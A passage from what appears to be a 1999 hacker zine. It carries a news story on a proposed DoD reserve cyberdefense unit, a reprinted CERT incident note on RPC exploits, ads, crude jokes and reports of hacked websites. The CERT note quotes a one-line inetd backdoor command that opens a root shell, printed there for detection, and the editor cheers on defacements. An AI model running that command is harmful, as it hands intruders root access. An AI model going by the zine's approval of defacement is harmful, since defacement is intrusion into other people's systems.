  10474.      BY DANIEL VERTON (dan_verton@fcw.com)
  10475.  
  10476.      A year-long study completed last week by a senior panel of Defense
  10477.      Department officials recommended an unprecedented expansion in the role the
  10478.      reserves play in national defense, including the formation of a virtual
  10479.      cyberdefense unit to protect the nation's critical infrastructure.
  10480.  
  10481.      The study, Reserve Component Employment Study 2005, was initiated in April
  10482.      1998 at the request of Defense Secretary William Cohen and concluded that the
  10483.      reserves are "particularly well-suited to homeland defense missions." In addition,
  10484.      the study called for the formation of a "joint [reserve component] virtual
  10485.      information operations organization" and tasked various senior-level DOD
  10486.      organizations to complete a "proof of concept" study for creating the unit by
  10487.      June 30, 2000.
  10488.  
  10489.      The new reserve cyberdefense unit "would consist of individuals with
  10490.      information technology skills who could perform their duties from dispersed
  10491.      locations rather than working as a single consolidated unit at a specific training
  10492.      center," the report said. To accomplish their mission of protecting various critical
  10493.      infrastructure nodes, the unit would communicate from existing reserve centers
  10494.      and other DOD facilities across the country that have access to the Secret
  10495.      Internet Protocol Routing Network.
  10496.  
  10497.      To form the new unit, the study recommended looking for reserve members in
  10498.      regions of the country where high concentrations of IT skill already exist. 
  10499.  
  10500.      In addition, the study suggested that the reserves consider recruiting
  10501.      high-tech-savvy people from the civilian sector, requiring them to join the
  10502.      reserves for a specific number of years in exchange for high-tech training
  10503.      provided by DOD.
  10504.  
  10505.      Establishing a "virtual organization" also would go a long way toward solving the
  10506.      department's problem of retaining personnel with critical IT skills and may allow
  10507.      DOD to reduce its reliance on external contractor support, the report said. "A
  10508.      'virtual organization' [also] could support the Joint Task Force [for] Computer
  10509.      Network Defense," the report said. Cohen established the JTF-CND in
  10510.      December 1998 to monitor and take defensive actions against hackers and other
  10511.      unauthorized users who try to penetrate DOD networks.
  10512.  
  10513.      Rick Forno, a security officer for Network Solutions Inc. and the former senior
  10514.      security analyst at the House of Representatives' Information Resources
  10515.      Security Office, said the report's recommendation to use the reserves for cyber
  10516.      defense "is a great idea" and represents one of DOD's more innovative
  10517.      initiatives. "I'm thrilled that DOD is looking to go outside the box on the
  10518.      Info-Protect/InfoCorps idea in the reserve components," said Forno, who
  10519.      proposed a similar idea to DOD a year ago. However, "it comes down to
  10520.      endorsement and support from senior leadership [whether or not] they let this
  10521.      organization function as intended," he said.
  10522.  
  10523.      Anthony M. Valletta, vice president of C3I systems for SRA Federal Systems
  10524.      and former acting assistant secretary of Defense for command, control,
  10525.      communications and intelligence, said the concept of using the reserves in this
  10526.      manner is one that the intelligence community has proven works. 
  10527.  
  10528.      "When we did this with the intelligence community, it worked extremely well,"
  10529.      Valletta said. "We have a lot of expertise in the reserves that we need to take
  10530.      advantage of."
  10531.  
  10532.      The main challenge facing the reserve cyberdefense corps idea, according to
  10533.      Valletta, is training and equipping the reserves to carry out the mission. "We
  10534.      have to keep up with the technology, and the reserves have to have the latest
  10535.      capabilities," Valletta said. "That is a major change of philosophy in terms of
  10536.      equipping the reserves."
  10537.  
  10538.      However, the idea of establishing a JTF for Homeland Defense also is an idea
  10539.      that some groups, particularly civil liberties organizations, may question.
  10540.  
  10541.      "The main issue is the Posse Comitatus Act and the limits on military activity
  10542.      within the U.S.," said Mark Lowenthal, former deputy assistant secretary of
  10543.      State for intelligence and now a member of Valletta's C3I consulting team at
  10544.      SRA. "If it is limited to what are clearly DOD facilities, then there should be no
  10545.      problem," he said. "If it steps over that line, then there are some legal issues that
  10546.      have to be addressed."
  10547.  
  10548.      Other recommendations contained in the report include using the reserves as
  10549.      part of a Joint Task Force headquarters for Homeland Defense, which would
  10550.      work with the Federal Emergency Management Agency and other civil
  10551.      authorities to coordinate responses to attacks involving nuclear, chemical and
  10552.      biological weapons, and increasing the use of smart card technology to reduce
  10553.      delays in processing reserve members for active-duty assignments. 
  10554.     
  10555.      @HWA
  10556.      
  10557. 81.0 CERT IN-99-04: Similar Attacks Using Various RPC Services
  10558.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10559.  
  10560.       CERT« Incident Note IN-99-04
  10561.  
  10562.                     The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community. 
  10563.  
  10564.                     Similar Attacks Using Various RPC Services
  10565.  
  10566.                     Thursday, July 22, 1999 
  10567.  
  10568.                     Overview
  10569.  
  10570.                     We have recently received an increasing number of reports that intruders are using similar methods to compromise systems. We have seen
  10571.                     intruders exploit three different RPC service vulnerabilities; however, similar artifacts have been found on compromised systems. 
  10572.  
  10573.                     Vulnerabilities we have seen exploited as a part of these attacks include: 
  10574.  
  10575.             CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd
  10576.  
  10577.             http://www.cert.org/advisories/CA-99-08-cmsd.html
  10578.  
  10579.             CA-99-05 - Vulnerability in statd exposes vulnerability in automountd
  10580.  
  10581.             http://www.cert.org/advisories/CA-99-05-statd-automountd.html
  10582.  
  10583.             CA-98.11 - Vulnerability in ToolTalk RPC Service
  10584.  
  10585.             http://www.cert.org/advisories/CA-98.11.tooltalk.html
  10586.  
  10587.        Description
  10588.  
  10589.        Recent reports involving these vulnerabilities have involved very similar intruder activity. The level of activity and the scope of the incidents suggests that intruders
  10590.        are using scripts to automate attacks. These attacks appear to attempt multiple exploitations but produce similar results. We have received reports of the
  10591.        following types of activity associated with these attacks: 
  10592.  
  10593.             Core files for rpc.ttdbserverd located in the root "/" directory, left by an exploitation attempt against rpc.ttdbserverd
  10594.  
  10595.             Files named callog.* located in the cmsd spool directory, left by an exploitation attempt against rpc.cmsd
  10596.  
  10597.             Exploitations that execute similar commands to create a privileged back door into a compromised host. Typically, a second instance of the inetd daemon
  10598.             is started using an intruder-supplied configuration file. The configuration file commonly contains an entry that provides the intruder a privileged back door
  10599.             into the compromised host. The most common example we have seen looks like this: 
  10600.  
  10601.                   /bin/sh -c echo 'ingreslock stream tcp wait root /bin/sh -i' >> /tmp/bob;/usr/sbin/inetd -s /tmp/bob
  10602.                 
  10603.  
  10604.             If successfully installed and executed, this back door may be used by an intruder to gain privileged (e.g., root) access to a compromised host by
  10605.             connecting to the port associated with the ingreslock service, which is typically TCP port 1524. The file names and service names are arbitrary; they may
  10606.             be changed to create an inetd configuration file in a different location or a back door on a different port.
  10607.  
  10608.             In many cases, scripts have been used to automate intruder exploitation of back doors installed on compromised hosts. This method has been used to
  10609.             install and execute various intruder tools and tool archives, initiate attacks on other hosts, and collect output from intruder tools such as packet sniffers. 
  10610.  
  10611.             One common set of intruder tools we have seen is included in an archive file called neet.tar, which includes several intruder tools:
  10612.  
  10613.                  A packet sniffer named update or update.hme that produces an output file named output or output.hme
  10614.  
  10615.                  A back door program named doc that is installed as a replacement to /usr/sbin/inetd. The back door is activated when a connection is received
  10616.                  from a particular source port and a special string is provided. We have seen the source port of 53982 commonly used.
  10617.  
  10618.                  A replacement ps program to hide intruder processes. We have seen a configuration file installed at /tmp/ps_data on compromised hosts.
  10619.  
  10620.             Another common set of intruder tools we have seen is included in an archive file called leaf.tar, which includes serveral intruder tools:
  10621.  
  10622.                  A replacement in.fingerd program with a back door for intruder access to the compromised host
  10623.  
  10624.                  eggdrop, an IRC tool commonly installed on compromised hosts by intruders. In this activity, we've seen the binary installed as /usr/sbin/nfds
  10625.  
  10626.                  Various files and scripts associated with eggdrop, many of which are installed in the directory /usr/lib/rel.so.1
  10627.  
  10628.                  A replacement root crontab entry used to start eggdrop 
  10629.  
  10630.             It is possible that other tools and tool archives could be involved in similar activity. 
  10631.  
  10632.             In some cases, we have seen intruder scripts remove or destroy system binaries and configuration files. 
  10633.  
  10634.        Solutions
  10635.  
  10636.        If you believe a host has been compromised, we encourage you to disconnect the host from the network and review our steps for recovering from a root
  10637.        compromise: 
  10638.  
  10639.             http://www.cert.org/tech_tips/root_compromise.html 
  10640.  
  10641.        In many cases intruders have installed packet sniffers on compromised hosts and have used scripts to automate collection of the output logs. It may be the case
  10642.        that usernames and passwords used in network transactions with a compromised host, or on the same network segment as a compromised host, may have
  10643.        fallen into intruder hands and are no longer secure. We encourage you to address password security issues after any compromised hosts at your site have been
  10644.        secured. 
  10645.  
  10646.        You should also review the state of security on other hosts on your network. If usernames and passwords have been compromised, an intruder may be able to
  10647.        gain unauthorized access to other hosts on your network. Also, an intruder may be able to use trust relationships between hosts to gain unauthorized access
  10648.        from a compromised host. Our intruder detection checklist can help you to evaluate a host's state of security: 
  10649.  
  10650.             http://www.cert.org/tech_tips/intruder_detection_checklist.html 
  10651.  
  10652.        We encourage you to ensure that your hosts are current with security patches or work-arounds for well-known vulnerabilities. In particular, you may wish to review
  10653.        the following CERT advisories for suggested solutions: 
  10654.  
  10655.             CA-99-08 - Buffer Overflow Vulnerability in rpc.cmsd
  10656.  
  10657.             http://www.cert.org/advisories/CA-99-08-cmsd.html
  10658.  
  10659.             CA-99-05 - Vulnerability in statd exposes vulnerability in automountd
  10660.  
  10661.             http://www.cert.org/advisories/CA-99-05-statd-automountd.html
  10662.  
  10663.             CA-98.11 - Vulnerability in ToolTalk RPC Service
  10664.  
  10665.             http://www.cert.org/advisories/CA-98.11.tooltalk.html
  10666.  
  10667.        We also encourage you to regularly review security related patches released by your vendors. 
  10668.  
  10669.  
  10670.        This document is available from: http://www.cert.org/incident_notes/IN-99-04.html. 
  10671.  
  10672.  
  10673.        CERT/CC Contact Information
  10674.  
  10675.        Email: cert@cert.org
  10676.        Phone: +1 412-268-7090 (24-hour hotline)
  10677.        Fax: +1 412-268-6989
  10678.        Postal address:
  10679.             CERT Coordination Center
  10680.             Software Engineering Institute
  10681.             Carnegie Mellon University
  10682.             Pittsburgh PA 15213-3890
  10683.             U.S.A.
  10684.  
  10685.        CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S.
  10686.        holidays, and on weekends. 
  10687.  
  10688.        Using encryption
  10689.  
  10690.        We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to
  10691.        use DES, please call the CERT hotline for more information. 
  10692.  
  10693.        Getting security information
  10694.  
  10695.        CERT publications and other security information are available from our web site http://www.cert.org/. 
  10696.  
  10697.        To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of
  10698.        your message. 
  10699.  
  10700.        Copyright 1999 Carnegie Mellon University.
  10701.        Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html. 
  10702.  
  10703.        * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office 
  10704.  
  10705.        NO WARRANTY
  10706.        Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon
  10707.        University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a
  10708.        particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any
  10709.        warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. 
  10710.        
  10711.        @HWA         
  10712.                                     
  10713.      !=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
  10714.            
  10715.            
  10716.            
  10717.            
  10718.                                              O
  10719.                                              0
  10720.                                              o
  10721.                                            O O O   
  10722.                                              0
  10723.  
  10724.      -=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
  10725.       
  10726.      END of main news articles content... read om for ads, humour, hacked websites etc
  10727.               
  10728.      -=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
  10729.      
  10730.      
  10731.      
  10732.              
  10733.                                 HWA.hax0r.news  
  10734.      
  10735.      
  10736.      
  10737.      
  10738.      
  10739. AD.S ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
  10740.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10741.       
  10742.       
  10743.        *****************************************************************************
  10744.        *                                                                           *
  10745.        *           ATTRITION.ORG     http://www.attrition.org                      *
  10746.        *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
  10747.        *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
  10748.        *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
  10749.        *                                                                           *
  10750.        *****************************************************************************      
  10751.               
  10752.  
  10753.        www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
  10754.        n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
  10755.        m www.2600.com ########################################ww.2600.com www.freeke
  10756.        vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
  10757.        com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
  10758.        kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
  10759.        k.com www.2600.########################################om www.2600.com www.fre
  10760.        ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
  10761.        k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
  10762.  
  10763.        <a href="http://www.2600.com/">www.2600.com</a>
  10764.        <a href="http://www.kevinmitnick.com></a>
  10765.        
  10766.        
  10767.        +-----------------------------------------------------------------------------+
  10768.        | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
  10769.        | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
  10770.        | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
  10771.        |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
  10772.        +-----------------------------------------------------------------------------+
  10773.        
  10774.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  10775.        * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
  10776.        *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
  10777.     <a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
  10778.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  10779.        
  10780.        
  10781.  
  10782.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  10783.        * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
  10784.        * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
  10785.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  10786.        
  10787.        
  10788.        
  10789.  
  10790.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  10791.        * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
  10792.        * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  10793.  
  10794.  
  10795.          //////////////////////////////////////////////////////////////////////////////
  10796.         //  To place an ad in this section simply type it up and email it to        //
  10797.        //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
  10798.       //////////////////////////////////////////////////////////////////////////////
  10799.  
  10800.  
  10801.      @HWA
  10802.      
  10803.        
  10804.               
  10805.              
  10806. HA.HA Humour and puzzles ...etc
  10807.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  10808.                                                            Don't worry. worry a *lot*
  10809.      
  10810.       Send in submissions for this section please! .............    
  10811.      
  10812.       From: Tom Phoenix 
  10813.       Newsgroups: alt.humor.best-of-usenet
  10814.       Subject: [comp.lang.pascal.delphi.databases] Re: Got Problems???
  10815.       Date: 6 Nov 1996 07:01:42 GMT
  10816.       Message-ID: <55pd4m$jvu@darkstar.ucsc.edu>
  10817.       Originator: brian@cse.ucsc.edu
  10818.       
  10819.       
  10820.       From: "Albert D. Cahalan"  
  10821.       Subject: Re: Got Problems???
  10822.       Newsgroups: comp.lang.pascal.delphi.databases,  comp.lang.pascal.delphi.misc
  10823.       
  10824.       David Moles  writes:
  10825.       
  10826.       > Nathan Denny wrote:
  10827.       >>
  10828.       >> WHAT THE F**K!?!?!?
  10829.       >>
  10830.       >> Look at where that got posted!  Like every development news group got
  10831.       >> hit by that.
  10832.       >>
  10833.       >> Blam!
  10834.       >>
  10835.       >> Nate:SCHCATS!
  10836.       >
  10837.       > It's all over comp.sys, too.
  10838.       
  10839.       Of course. They think all the computer hackers can't get a date.
  10840.       
  10841.       Instant fix:        gcc date.c -o date
  10842.       
  10843.       All the way:        gcc --entry
  10844.       For orgasm:         gcc -O
  10845.       Even better:        gcc -O2
  10846.       Cruel:              gcc -Wall
  10847.       For old hackers:    gcc -fno-strength-reduce
  10848.       Transvestite:       gcc -Wconversion
  10849.       With toy:           gcc -pipe
  10850.       Man on top:         gcc -traditional
  10851.       In restroom:        gcc -quiet
  10852.       Explain how:        gcc --verbose
  10853.       With drugs:         gcc --user-dependencies
  10854.       Don't move:         gcc -static
  10855.       At Microsoft:       gcc -shared
  10856.       Side-by-side:       gcc --profile
  10857.       Mouth first:        gcc --preprocess
  10858.       Before drugs:       gcc --prefix
  10859.       With disease:       gcc --no-warnings
  10860.       With vibrator:      gcc --machine
  10861.       Foreigner:          gcc --language
  10862.       With chains:        gcc --force-link
  10863.       With AIDS:          gcc --extra-warnings
  10864.       Analism:            gcc --dump
  10865.       Remove lice 1st:    gcc --debug
  10866.       Talk about date:    gcc --comments
  10867.       Take control:       gcc --assert
  10868.       
  10869.       
  10870.       --
  10871.       Moderators accept or reject articles based solely on the criteria posted
  10872.       in the Frequently Asked Questions. Article content is the responsibility
  10873.       of the submitter.  Submit articles to ahbou-sub@acpub.duke.edu. To write 
  10874.       to the moderators, send mail to ahbou-mod@acpub.duke.edu. 
  10875.       
  10876.  
  10877.       
  10878.       -=-
  10879.       
  10880.       
  10881.       Humour in UNIX Man Pages
  10882.  
  10883.       Here are some excerpts from UNIX (specifically solaris 2.5, but also some other OSes
  10884.      and some freeware packages) manpages and headerfiles. Probably a bit esoteric, so if you
  10885.      do not find the stuff funny, don't worry..... Some are actually not for laughing, but they
  10886.      make you cry or shout in anger. 
  10887.      
  10888.      
  10889.      
  10890.      man merge
  10891.      
  10892.      BUGS
  10893.      
  10894.      It normally does not make sense to merge binary files as if
  10895.      
  10896.      they were text, but merge tries to do it anyway.
  10897.      
  10898.      man diff
  10899.      
  10900.      -h Does a fast, half-hearted job. It works
  10901.      
  10902.      only when ...
  10903.      
  10904.      man tar
  10905.      
  10906.      ... The directory portion of file (see dirname(1))
  10907.      
  10908.      cannot exceed 155 characters. The file name portion
  10909.      
  10910.      (see basename(1)) cannot exceed 100 characters.
  10911.      
  10912.        
  10913.      
  10914.      man csh
  10915.      
  10916.      NOTES
  10917.      
  10918.      Words can be no longer than 1024 characters.
  10919.      
  10920.      
  10921.      [And by the way: THIS IS REALLY TRUE! Solaris2.4: 
  10922.        
  10923.      
  10924.      (mege@iqe3)[~] setenv test `cat /usr/dict/words | head -1000`
  10925.      
  10926.      (mege@iqe3)[~] csh
  10927.      
  10928.      iqe3[mege] echo $test
  10929.      
  10930.      Bus error
  10931.      
  10932.      cool, huh? 
  10933.      ] 
  10934.        
  10935.        
  10936.      
  10937.      /usr/local/sys/time.h
  10938.      
  10939.      /*
  10940.      
  10941.      * gettimeofday() and settimeofday() were included in SVr4 due to their
  10942.      
  10943.      * common use in BSD based applications. They were to be included exactly
  10944.      
  10945.      * as in BSD, with two parameters. However, AT&T/USL noted that the second
  10946.      
  10947.      * parameter was unused and deleted it, thereby making a routine included
  10948.      
  10949.      * for compatibility, uncompatible.
  10950.      
  10951.      *
  10952.      
  10953.      * XSH4.2 (spec 1170) defines gettimeofday and settimeofday to have two
  10954.      
  10955.      * parameters.
  10956.      
  10957.      *
  10958.      
  10959.      * This has caused general disagreement in the application community as to
  10960.      
  10961.      * the syntax of these routines. Solaris defaults to the XSH4.2 definition.
  10962.      
  10963.      * The flag _SVID_GETTOD * may be used to force the SVID version.
  10964.      
  10965.      */
  10966.      
  10967.      man top
  10968.      
  10969.      BUGS
  10970.      
  10971.      Don't shoot me, but the default for - I has changed once
  10972.      
  10973.      again. So many people were confused by the fact that top
  10974.      
  10975.      wasn't showing them all the processes that I have decided to
  10976.      
  10977.      make the default behavior show idle processes, just like it
  10978.      
  10979.      did in version 2. But to appease folks who can't stand that
  10980.      
  10981.      behavior, I have added the ability to set "default" options
  10982.      
  10983.      in the environment variable TOP (see the OPTIONS section).
  10984.      
  10985.      Those who want the behavior that version 3.0 had need only
  10986.      
  10987.      set the environment variable TOP to "-I".
  10988.      
  10989.        
  10990.      
  10991.      man ps
  10992.      
  10993.      pcpu The ratio of CPU time used recently to CPU time
  10994.      
  10995.      available in the same period, expressed as a
  10996.      
  10997.      percentage. The meaning of ``recently'' in this
  10998.      
  10999.      context is unspecified. The CPU time available
  11000.      
  11001.      is determined in an unspecified manner.
  11002.      
  11003.      man chat
  11004.      
  11005.      ...
  11006.      
  11007.      < snip >
  11008.      
  11009.      ...
  11010.      
  11011.      COPYRIGHT
  11012.      
  11013.      The chat program is in public domain. This is not the GNU
  11014.      
  11015.      public license. If it breaks then you get to keep both
  11016.      
  11017.      pieces.
  11018.      
  11019.        
  11020.      
  11021.      man FvwmM4
  11022.      
  11023.        
  11024.      
  11025.      NAME
  11026.      
  11027.      FvwmM4 - the FVWM M4 pre-processor
  11028.      
  11029.      ...
  11030.      
  11031.      AUTHOR
  11032.      
  11033.      FvwmM4 is the result of a random bit mutation on a hard
  11034.      
  11035.      disk, presumably a result of a cosmic-ray or some such
  11036.      
  11037.      thing.
  11038.      
  11039.        
  11040.      
  11041.        
  11042.      
  11043.      man ce_db_build
  11044.      
  11045.      ...
  11046.      
  11047.      BUGS
  11048.      
  11049.      ...
  11050.      
  11051.      Running ce_db_build on an empty ASCII file causes it to hang
  11052.      
  11053.      indefinitely as though it were in an infinite loop.
  11054.      
  11055.      
  11056.      Comment: Compare the time to fix this bug to the time required to write this 
  11057.      comment into the manpage.... 
  11058.      
  11059.      cat /bin/clear
  11060.      
  11061.      I really wonder how Microsoft sold this code to Sun Microsystems..... 
  11062.      
  11063.      #!/usr/bin/sh
  11064.      #       Copyright (c) 1984, 1986, 1987, 1988, 1989 AT&T
  11065.      #         All Rights Reserved
  11066.       
  11067.      #       THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF AT&T
  11068.      #       The copyright notice above does not evidence any
  11069.      #       actual or intended publication of such source code.
  11070.       
  11071.      #ident  "@(#)clear.sh   1.7     93/04/07 SMI"   /* SVr4.0 1.3   */
  11072.      #       Copyright (c) 1987, 1988 Microsoft Corporation
  11073.      #         All Rights Reserved
  11074.       
  11075.      #       This Module contains Proprietary Information of Microsoft
  11076.      #       Corporation and should be treated as Confidential.
  11077.       
  11078.      # clear the screen with terminfo.
  11079.      # if an argument is given, print the clear string for that tty type
  11080.       
  11081.      tput ${1:+-T$1} clear 2> /dev/null 
  11082.            
  11083.       
  11084.      -=-
  11085.      
  11086.          
  11087.      
  11088.      10 Answers when asked about a bug
  11089.  
  11090.      - I don't think that this is really a bug 
  11091.      - It would be too hard to implement right 
  11092.      - Fixing this would need a change in the documentation 
  11093.      - It wouldn't work right anyway 
  11094.      - This bug is too hard to track down 
  11095.      - This bug doesn't really interfere with normal use of the program 
  11096.      - Well, how do you think it should work? 
  11097.      - Why not fix it later? 
  11098.      - No program can be absolutely bug-free 
  11099.      - We'll fix that on the next major redesign
  11100.   
  11101.      -=-
  11102.      
  11103.      http://wwwhost.cc.utexas.edu/computer/vcl/bkreviews/bkcmcntd.html
  11104.      
  11105.      The Computer Contradictionary,  Stan Kelly-Bootle
  11106.  
  11107.      Review written by Robert M. Slade. 
  11108.  
  11109.      The only two computer dictionaries worth having are both from MIT Press: 
  11110.      "The New Hacker's Dictionary" (cf. BKNHACKD.RVW), and this one. As news is
  11111.      something that someone, somewhere, wants hushed up, so the only computer terms
  11112.      of any importance are those that someone, somewhere, just made up. Everything
  11113.      else is the perverted verbiage of a marketing department. 
  11114.  
  11115.      Where "Hacker's" (or TNHD) studies and stores the language of the anarchic technical
  11116.      crowd, the Contradictionary deals with the jargon of those who work in DP,T, and 
  11117.      IS--those who truly understand MISmanagement. It is not intended to be a reference 
  11118.      work--Kelly-Bootle notes that the reader should determine the meaning of a word *before*
  11119.      looking it up in this book--but a work of humour. Like all the best humour, of course, 
  11120.      it has strong points to make. 
  11121.  
  11122.      copyright Robert M. Slade, 1995 BKCMCNTD.RVW 950602 
  11123.  
  11124.      7 June 1999
  11125.      Christine M. Henke, ACITS at UT Austin   
  11126.             
  11127.       @HWA
  11128.        
  11129.        
  11130.        
  11131.  SITE.1 two sites this week
  11132.  
  11133.       #1 From #feed-the-goats
  11134.       
  11135.       http://www.pure-security.net/
  11136.       SiteOps: ox1dation and mosthated
  11137.       
  11138.       
  11139.       Just check it out... recent face lift looks good, i've lifted some text warez from
  11140.       their archive for this issue. - Ed
  11141.       
  11142.       
  11143.       
  11144.       #2
  11145.  
  11146.   
  11147.       http://www.hack.gr/
  11148.       
  11149.       SiteOp: ?
  11150.       
  11151.       
  11152.       Straight from the site itself, check it out;
  11153.       
  11154.       HACK.gr SERVER PROFILE
  11155.                            
  11156.  
  11157.       What is HACK.gr
  11158.  
  11159.       HACK.gr is a greek Web Server, focusing its interest in security of
  11160.       computer systems and networks. It is working experimentally since
  11161.       November 1997 and is still (!) in pilot phase.
  11162.  
  11163.       Who owns HACK.gr
  11164.  
  11165.       The hack.gr domain and web server are owned and administered by Aris
  11166.       Koxaras, Helias Fotopoulos and Costas Christoyannis. They are all
  11167.       students of the Computer Engineering and Informatics Department, in
  11168.       the Engineering School of the University of Patras and are working as
  11169.       Unix system administrators in the Department.
  11170.  
  11171.       Why HACK.gr - What hacker means
  11172.  
  11173.       The term hacker, in computer terminology, is used for those who have
  11174.       a deeper knowledge of the details of programmable systems. Jargon
  11175.       Dictionary uses the following meanings:
  11176.  
  11177.               - One who programs enthusiastically (even obsessively) or who
  11178.                 enjoys programming rather than just theorizing about
  11179.                 programming 
  11180.               - A person who is good at programming quickly 
  11181.                 An expert at a particular program, or one who frequently does
  11182.                 work using it or on it 
  11183.  
  11184.       However, mainly due to the mass media, a negative meaning of the
  11185.       word hacker is used to describe one who makes bad use of his
  11186.       knowledge in order either to obtain access to anauthorised information
  11187.       or to cause damage. Jargon Dictionary notes:
  11188.  
  11189.               - [deprecated] A malicious meddler who tries to discover sensitive
  11190.                 information by poking around. The correct term for this sense is
  11191.                 cracker.
  11192.  
  11193.       This use of the word by mass media, for cases of software piracy,
  11194.       violation of intellectual rights, publishing of pornographic material and
  11195.       cause of damages in computer systems is totally incorrect.
  11196.  
  11197.       Content of HACK.gr
  11198.  
  11199.       HACK.gr offers already an online magazine (HACK.gr Gazette), hosts
  11200.       the web page of the Black Hole column of the .net magazine and news
  11201.       from the greek demo scene. It offers a meta search engine for the
  11202.       Greek cyberspace (MSE) and is working on mirroring of foreign web
  11203.       sites, indices of documents and web pages for easy access to
  11204.       information, fora creation etc. HACK.gr hosts pages of independent
  11205.       sources, whose content is managed by specific rules, but does not
  11206.       agree necessarily with the official thesis of HACK.gr.
  11207.  
  11208.       Access to HACK.gr
  11209.  
  11210.       HACK.gr does not offer shell access to people other than its
  11211.       administrators. It only offers the capability of uploading web pages and
  11212.       e-mail aliases to users, whose pages are hosted in the site. The
  11213.       computer used is a Pentium with Linux Operating System, Apache Web
  11214.       Server and QMail e-mail server. Network access is offered by Groovy
  11215.       Net.
  11216.  
  11217.       Friends and ennemies
  11218.  
  11219.       HACK.gr was accepted with positive comments by system
  11220.       administrators, journalists and many netsurfers. Long time before the
  11221.       transition from the initial idea to its realisation, HACK.gr owners were
  11222.       "urged" by big Internet Providers to come at hosting agreement. Server
  11223.       hits turned out to be far more than expected, being more than 100,000
  11224.       per month, though the server is still in pilot/experimental function.
  11225.       However, some people are trying to "hush" HACK.gr and obscure its
  11226.       image, attempting to charge it with cause of problems. Having perfect
  11227.       cooperation with the involved Internet Providers, HACK.gr has
  11228.       repeatingly shown responsible attitude and proved that it has nothing
  11229.       to do with those intrigues. HACK.gr has helped various sites in security
  11230.       matters and cooparated in various cases with "competitors", such as
  11231.       the Next Crawler meta search engine.
  11232.  
  11233.       
  11234.       - eentity
  11235.         
  11236.         
  11237.         
  11238.        
  11239.       @HWA
  11240.        
  11241.          
  11242.          
  11243.   H.W Hacked websites 
  11244.       ~~~~~~~~~~~~~~~~
  11245.  
  11246.       Note: The hacked site reports stay, especially with some cool hits by
  11247.             groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
  11248.  
  11249.           * Hackers Against Racist Propaganda (See issue #7)
  11250.  
  11251.      
  11252.       Haven't heard from Catharsys in a while for those following their saga visit
  11253.       http://frey.rapidnet.com/~ptah/ for 'the story so far'...
  11254.       
  11255.      
  11256.      
  11257.      From HNN rumours section http://www.hackernews.com/
  11258.      see the archives section on HNN or attrition.org for copies of many of these
  11259.      sites in their defaced form.
  11260.      
  11261.      July 27th
  11262.      
  11263.      MUSICIANS HACKED
  11264.      by BHZ, Tuesday 27th July 1999 on 11:50 pm CET
  11265.      One last article for me. Keebler elves hacked couple of musicians web sites. Sites
  11266.      from following artists had been hacked - Gipsy Kings, Jewel, Tricky Daddy, Sugar
  11267.      Ray, Stone Temple Pilots, Led Zeppelin and the official site of 3 tenors. You can find
  11268.      mirrors of hacked sites on Attrition. 
  11269.  
  11270.      
  11271.      
  11272.      July 29th
  11273.      
  11274.      From www.net-security.com
  11275.      
  11276.      HIT2000 GETS DEFACED
  11277.      by Thejian, Thursday 29th July 1999 on 10:00 pm CET
  11278.      The dutch Hit2000 Con's Web site got hacked yesterday. An archive of the hack can
